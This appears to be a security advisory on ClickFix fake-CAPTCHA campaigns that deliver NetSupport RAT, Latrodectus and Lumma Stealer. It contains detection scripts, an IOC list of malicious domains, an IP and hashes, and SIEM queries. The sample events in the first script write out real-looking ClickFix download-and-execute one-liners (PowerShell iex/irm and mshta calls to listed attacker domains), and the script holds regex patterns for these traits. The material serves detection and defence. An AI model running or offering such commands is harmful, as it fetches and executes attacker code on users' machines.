Fix the Click: Preventing the ClickFix Attack Vector

    Date: 07/11/2025

    Severity: High

    Summary

This article provides hunting tips and mitigation strategies for ClickFix campaigns, along with insights into major 2025 incidents. Notable cases include NetSupport RAT delivered through a new loader, Latrodectus malware using ClickFix lures, and widespread Lumma Stealer activity. ClickFix is a growing social engineering technique in which a fake CAPTCHA, error message or "quick fix" page instructs the user to copy a command and paste it into the Windows Run dialog, a terminal or a PowerShell window, so the victim launches the malicious command themselves and no exploit is required. These campaigns abuse trust in legitimate, built-in tools such as PowerShell, though the original software authors are not responsible for the misuse.
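The pasted command itself is the most durable thing to hunt for, because the lure domains rotate far faster than the technique. The following is an added example written for this page, not code from the original advisory, from Gurucul or from Unit 42: it scores process-creation events for the traits a ClickFix one-liner usually carries (a hidden window, an execution-policy bypass, an encoded or remotely fetched payload, mshta pulling a remote HTA, and the fake verification comment appended so the Run box looks harmless), and weights the result by whether the parent process is the interactive shell. The events and their field names (host, parent, cmd) are constructed assumptions rather than any SIEM schema; two of the sample command lines reuse domains from the IOC list below.

```python
"""Heuristic ClickFix command-line triage.

Added example for this advisory; it is not code from the original page, from
Gurucul TDIR, or from the Unit 42 report it references. The process events
below are constructed for illustration, and the field names (host, parent,
cmd) are assumptions rather than any particular SIEM schema.
"""
import base64
import re

# Binaries a ClickFix lure typically tells the victim to launch from the
# Win+R dialog, a terminal, or a pasted one-liner.
LAUNCHER = re.compile(
    r"\b(?:powershell|pwsh|mshta|cmd|curl|certutil|bitsadmin)(?:\.exe)?\b", re.I)

# Individual traits of a pasted download-and-execute command. None is
# conclusive on its own; several together are.
INDICATORS = {
    "hidden_window": re.compile(r"-(?:w|win|windowstyle)\s+h(?:idden)?\b", re.I),
    "policy_bypass": re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass\b", re.I),
    "encoded_cmd":   re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{24,}", re.I),
    "remote_fetch":  re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|curl|wget)\b", re.I),
    "inline_exec":   re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "mshta_url":     re.compile(r"\bmshta(?:\.exe)?\s+['\"]?https?://", re.I),
    # Lures often append a fake verification string so the Run box looks harmless.
    "captcha_tail":  re.compile(r"#\s*.*(?:not a robot|human|verif|captcha)", re.I),
}

# A Run-dialog or terminal paste shows up as one of these spawning the launcher.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "openwith.exe"}


def decode_encoded(cmd):
    """Return the plaintext of a -EncodedCommand payload (UTF-16LE base64), or None."""
    m = INDICATORS["encoded_cmd"].search(cmd)
    if not m:
        return None
    blob = m.group(0).split(None, 1)[1]
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event):
    """Score one process-creation event and return a verdict with its evidence."""
    cmd = event["cmd"]
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    if event.get("parent", "").lower() in INTERACTIVE_PARENTS and LAUNCHER.search(cmd):
        hits.append("interactive_parent")
    # mshta fetching a remote HTA is enough by itself; otherwise require three traits.
    suspect = "mshta_url" in hits or len(hits) >= 3
    return {
        "host": event["host"],
        "verdict": "clickfix_suspect" if suspect else "benign",
        "hits": hits,
        "decoded": decode_encoded(cmd),
    }


def triage(events):
    return [classify(e) for e in events]


# Constructed sample: a -EncodedCommand payload built at runtime so it decodes cleanly.
ENCODED = base64.b64encode("IEX (New-Object Net.WebClient)".encode("utf-16le")).decode()

SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"host": "WS01", "parent": "explorer.exe",
     "cmd": 'powershell.exe -w hidden -ep bypass -c "iex (irm https://stuffgull.top/verify)" '
            '# I am not a robot - reCAPTCHA Verification ID: 4851'},
    {"host": "WS02", "parent": "explorer.exe",
     "cmd": "mshta https://mhousecreative.com/verify.hta"},
    {"host": "SRV01", "parent": "services.exe",  # legitimate scheduled script, not ClickFix
     "cmd": '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
            "-NoProfile -ExecutionPolicy Bypass -File C:\\ProgramData\\Backup\\nightly.ps1"},
    {"host": "WS03", "parent": "explorer.exe", "cmd": "cmd.exe /c ipconfig /all"},
    {"host": "WS04", "parent": "explorer.exe", "cmd": f"powershell -nop -w hidden -enc {ENCODED}"},
]

if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        extra = f"  decoded={r['decoded']!r}" if r["decoded"] else ""
        print(f"{r['host']:6} {r['verdict']:16} {','.join(r['hits'])}{extra}")
```

The thresholds are deliberately simple; the point is that an interactive parent plus several traits separates a pasted ClickFix command from an administrative script that also happens to use -ExecutionPolicy Bypass, and that decoding -EncodedCommand payloads at triage time turns an opaque blob into something an analyst can read.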

    Indicators of Compromise (IOC) List 

Domains / URLs:

    iplogger.co

    stuffgull.top

    sumeriavgv.digital

    pub-164d8d82c41c4e1b871bc21802a18154.r2.dev

    pub-626890a630d8418ea6c2ef0fa17f02ef.r2.dev

    pub-a5a2932dc7f143499b865f8580102688.r2.dev

    pub-7efc089d5da740a994d1472af48fc689.r2.dev

    agroeconb.live

    animatcxju.live

    https://webbs.live/on/

    https://diab.live/up/

    https://mhbr.live/do/

    https://decr.live/j/

    https://lexip.live/n/

    https://rimz.live/u/

    https://byjs.live/v/

    https://btco.live/r/

    https://izan.live/r/

    https://k.veuwb.live/234

    https://r.netluc.live

    heyues.live

    https://k.mailam.live/234234

    oktacheck.it.com

    doccsign.it.com

    docusign.sa.com

    dosign.it.com

    loyalcompany.net

    leocompany.org

    mhousecreative.com

    mh-sns.com

    lasix20.com

IP Address:

    80.77.23.48

Hash (SHA-256):

2bc23b53bb76e59d84b0175e8cba68695a21ed74be9327f0b6ba37edc2daaeef

06efe89da25a627493ef383f1be58c95c3c89a20ebb4af4696d82e729c75d1a7

5809c889e7507d357e64ea15c7d7b22005dbf246aefdd3329d4a5c58d482e7e1

52e6e819720fede0d12dcc5430ff15f70b5656cbd3d5d251abfc2dcd22783293

57e75c98b22d1453da5b2642c8daf6c363c60552e77a52ad154c200187d20b9a

33a0cf0a0105d8b65cf62f31ec0a6dcd48e781d1fece35b963c6267ab2875559

5c762ff1f604e92ecd9fd1dc5d1cb24b3af4b4e0d25de462c78f7ac0f897fc2d

9dca5241822a0e954484d6c303475f94978b6ef0a016cbae1fba29d0aed86288

cbaf513e7fd4322b14adcc34b34d793d79076ad310925981548e8d3cff886527

506ab08d0a71610793ae2a5c4c26b1eb35fd9e3c8749cd63877b03c205feb48a

3acc40334ef86fd0422fb386ca4fb8836c4fa0e722a5fcfa0086b9182127c1d7

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

Domains / URLs:

domainname like "https://k.veuwb.live/234" or url like "https://k.veuwb.live/234" or siteurl like "https://k.veuwb.live/234" or domainname like "https://r.netluc.live" or url like "https://r.netluc.live" or siteurl like "https://r.netluc.live" or domainname like "https://decr.live/j/" or url like "https://decr.live/j/" or siteurl like "https://decr.live/j/" or domainname like "https://lexip.live/n/" or url like "https://lexip.live/n/" or siteurl like "https://lexip.live/n/" or domainname like "docusign.sa.com" or url like "docusign.sa.com" or siteurl like "docusign.sa.com" or domainname like "agroeconb.live" or url like "agroeconb.live" or siteurl like "agroeconb.live" or domainname like "doccsign.it.com" or url like "doccsign.it.com" or siteurl like "doccsign.it.com" or domainname like "iplogger.co" or url like "iplogger.co" or siteurl like "iplogger.co" or domainname like "mh-sns.com" or url like "mh-sns.com" or siteurl like "mh-sns.com" or domainname like "https://izan.live/r/" or url like "https://izan.live/r/" or siteurl like "https://izan.live/r/" or domainname like "pub-164d8d82c41c4e1b871bc21802a18154.r2.dev" or url like "pub-164d8d82c41c4e1b871bc21802a18154.r2.dev" or siteurl like "pub-164d8d82c41c4e1b871bc21802a18154.r2.dev" or domainname like "stuffgull.top" or url like "stuffgull.top" or siteurl like "stuffgull.top" or domainname like "pub-7efc089d5da740a994d1472af48fc689.r2.dev" or url like "pub-7efc089d5da740a994d1472af48fc689.r2.dev" or siteurl like "pub-7efc089d5da740a994d1472af48fc689.r2.dev" or domainname like "leocompany.org" or url like "leocompany.org" or siteurl like "leocompany.org" or domainname like "https://diab.live/up/" or url like "https://diab.live/up/" or siteurl like "https://diab.live/up/" or domainname like "oktacheck.it.com" or url like "oktacheck.it.com" or siteurl like "oktacheck.it.com" or domainname like "mhousecreative.com" or url like "mhousecreative.com" or siteurl like "mhousecreative.com" or domainname like "sumeriavgv.digital" or url like "sumeriavgv.digital" or siteurl like "sumeriavgv.digital" or domainname like "pub-626890a630d8418ea6c2ef0fa17f02ef.r2.dev" or url like "pub-626890a630d8418ea6c2ef0fa17f02ef.r2.dev" or siteurl like "pub-626890a630d8418ea6c2ef0fa17f02ef.r2.dev" or domainname like "pub-a5a2932dc7f143499b865f8580102688.r2.dev" or url like "pub-a5a2932dc7f143499b865f8580102688.r2.dev" or siteurl like "pub-a5a2932dc7f143499b865f8580102688.r2.dev" or domainname like "animatcxju.live" or url like "animatcxju.live" or siteurl like "animatcxju.live" or domainname like "https://webbs.live/on/" or url like "https://webbs.live/on/" or siteurl like "https://webbs.live/on/" or domainname like "https://mhbr.live/do/" or url like "https://mhbr.live/do/" or siteurl like "https://mhbr.live/do/" or domainname like "https://rimz.live/u/" or url like "https://rimz.live/u/" or siteurl like "https://rimz.live/u/" or domainname like "https://byjs.live/v/" or url like "https://byjs.live/v/" or siteurl like "https://byjs.live/v/" or domainname like "https://btco.live/r/" or url like "https://btco.live/r/" or siteurl like "https://btco.live/r/" or domainname like "heyues.live" or url like "heyues.live" or siteurl like "heyues.live" or domainname like "https://k.mailam.live/234234" or url like "https://k.mailam.live/234234" or siteurl like "https://k.mailam.live/234234" or domainname like "dosign.it.com" or url like "dosign.it.com" or siteurl like "dosign.it.com" or domainname like "loyalcompany.net" or url like "loyalcompany.net" or siteurl like "loyalcompany.net" or domainname like "lasix20.com" or url like "lasix20.com" or siteurl like "lasix20.com"

Note: the scheme-prefixed entries (for example "https://k.veuwb.live/234") can only match a field that stores the complete URL; a domainname field never contains "https://", so to catch those in domainname or siteurl match on the hostname (k.veuwb.live) instead. Also confirm whether your TDIR version treats like as a substring match or requires explicit wildcards, since the patterns above carry none.

IP Address:

dstipaddress IN ("80.77.23.48") or srcipaddress IN ("80.77.23.48")

Hash (SHA-256):

sha256hash IN ("33a0cf0a0105d8b65cf62f31ec0a6dcd48e781d1fece35b963c6267ab2875559","06efe89da25a627493ef383f1be58c95c3c89a20ebb4af4696d82e729c75d1a7","2bc23b53bb76e59d84b0175e8cba68695a21ed74be9327f0b6ba37edc2daaeef","cbaf513e7fd4322b14adcc34b34d793d79076ad310925981548e8d3cff886527","52e6e819720fede0d12dcc5430ff15f70b5656cbd3d5d251abfc2dcd22783293","5809c889e7507d357e64ea15c7d7b22005dbf246aefdd3329d4a5c58d482e7e1","57e75c98b22d1453da5b2642c8daf6c363c60552e77a52ad154c200187d20b9a","5c762ff1f604e92ecd9fd1dc5d1cb24b3af4b4e0d25de462c78f7ac0f897fc2d","9dca5241822a0e954484d6c303475f94978b6ef0a016cbae1fba29d0aed86288","506ab08d0a71610793ae2a5c4c26b1eb35fd9e3c8749cd63877b03c205feb48a","3acc40334ef86fd0422fb386ca4fb8836c4fa0e722a5fcfa0086b9182127c1d7")

Note: the published hashes were mixed case and IN comparisons are literal in most SIEMs, so the values above are lower-cased; check that the sha256hash field is stored in the same case in your ingestion, or normalise it in the query.
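Because the IOC list mixes bare domains, scheme-prefixed URLs with paths, a duplicated entry, an IP address placed among the domains, and hashes in two cases, matching it verbatim in a like clause leaves gaps. The following is an added example, not Gurucul TDIR code: it normalises a subset of the page's IOCs into hostnames, URL prefixes, IPs and lower-case hashes, matches them against constructed proxy and EDR events (the field names url, dst_ip and sha256 are assumptions), and emits the domain clause in the TDIR syntax shown above using hostnames only. The query dialect is imitated from the page itself, not taken from Gurucul documentation.

```python
"""Normalise the advisory's mixed IOC list and match it against proxy/EDR events.

Added example for this advisory; it is not Gurucul TDIR code, and the query
dialect in to_tdir_clause() is only imitated from the page. The IOC values are
a subset of the list above; the events are constructed for illustration, and
their field names (url, dst_ip, sha256) are assumptions.
"""
import ipaddress
from urllib.parse import urlsplit

RAW_IOCS = [
    "iplogger.co", "stuffgull.top", "sumeriavgv.digital",
    "pub-164d8d82c41c4e1b871bc21802a18154.r2.dev",
    "pub-164d8d82c41c4e1b871bc21802a18154.r2.dev",   # listed twice on the page
    "https://webbs.live/on/", "https://k.veuwb.live/234", "https://r.netluc.live",
    "docusign.sa.com", "80.77.23.48",                   # an IP sits in the domain list
]
RAW_HASHES = [
    "2bc23b53bb76e59d84b0175e8cba68695a21ed74be9327f0b6ba37edc2daaeef",
    "5C762FF1F604E92ECD9FD1DC5D1CB24B3AF4B4E0D25DE462C78F7AC0F897FC2D",  # case normalised below
]


def normalise(raw_iocs, raw_hashes):
    """Split the list into hostnames, (host, path) URL prefixes, IPs and lower-case hashes."""
    hosts, url_prefixes, ips = set(), set(), set()
    for ioc in raw_iocs:
        ioc = ioc.strip().lower()
        try:
            ips.add(str(ipaddress.ip_address(ioc)))
            continue
        except ValueError:
            pass
        if "://" in ioc:
            parts = urlsplit(ioc)
            hosts.add(parts.hostname)           # the host is attacker-controlled either way
            if parts.path and parts.path != "/":
                url_prefixes.add((parts.hostname, parts.path))
        else:
            hosts.add(ioc)
    return {"hosts": hosts, "url_prefixes": url_prefixes, "ips": ips,
            "hashes": {h.lower() for h in raw_hashes}}


def host_matches(host, hosts):
    """Exact or subdomain match, so cdn.stuffgull.top hits stuffgull.top."""
    host = host.lower().rstrip(".")
    return any(host == h or host.endswith("." + h) for h in hosts)


def match_event(event, iocs):
    """Return the list of IOC reasons an event triggers (empty when clean)."""
    reasons = []
    url = event.get("url")
    if url:
        parts = urlsplit(url)
        if parts.hostname and host_matches(parts.hostname, iocs["hosts"]):
            reasons.append(f"host:{parts.hostname}")
        for h, p in iocs["url_prefixes"]:
            if parts.hostname == h and parts.path.startswith(p):
                reasons.append(f"url:{h}{p}")
    if event.get("dst_ip") in iocs["ips"]:
        reasons.append(f"ip:{event['dst_ip']}")
    sha = (event.get("sha256") or "").lower()
    if sha in iocs["hashes"]:
        reasons.append(f"sha256:{sha[:12]}")
    return reasons


def sweep(events, iocs):
    return {e["host"]: match_event(e, iocs) for e in events}


def to_tdir_clause(iocs):
    """Emit the domain/URL clause in the page's TDIR syntax: hostnames only, deduplicated."""
    terms = [f'domainname like "{h}" or url like "{h}" or siteurl like "{h}"'
             for h in sorted(iocs["hosts"])]
    return " or ".join(terms)


IOCS = normalise(RAW_IOCS, RAW_HASHES)

SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"host": "WS01", "url": "https://cdn.stuffgull.top/Verify.txt"},
    {"host": "WS02", "url": "https://k.veuwb.live/234?id=7"},
    {"host": "WS03", "url": "http://example.com/docs", "dst_ip": "80.77.23.48"},
    {"host": "WS04", "sha256": "2BC23B53BB76E59D84B0175E8CBA68695A21ED74BE9327F0B6BA37EDC2DAAEEF"},
    {"host": "WS05", "url": "https://www.docusign.com/account"},  # the real site, not the lookalike
]

if __name__ == "__main__":
    for host, reasons in sweep(SAMPLE_EVENTS, IOCS).items():
        print(f"{host:6} {', '.join(reasons) or 'clean'}")
    print(to_tdir_clause(IOCS))
```

Matching on the hostname rather than the full URL is a deliberate widening: a ClickFix lure host serves many paths and subdomains, so a hit on cdn.stuffgull.top is as interesting as one on the exact URL, while the lookalike docusign.sa.com still never matches the genuine docusign.com.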

    Reference:

    https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/


Tags

Malware, Latrodectus, Lumma Stealer, RAT, NetSupport RAT, ClickFix
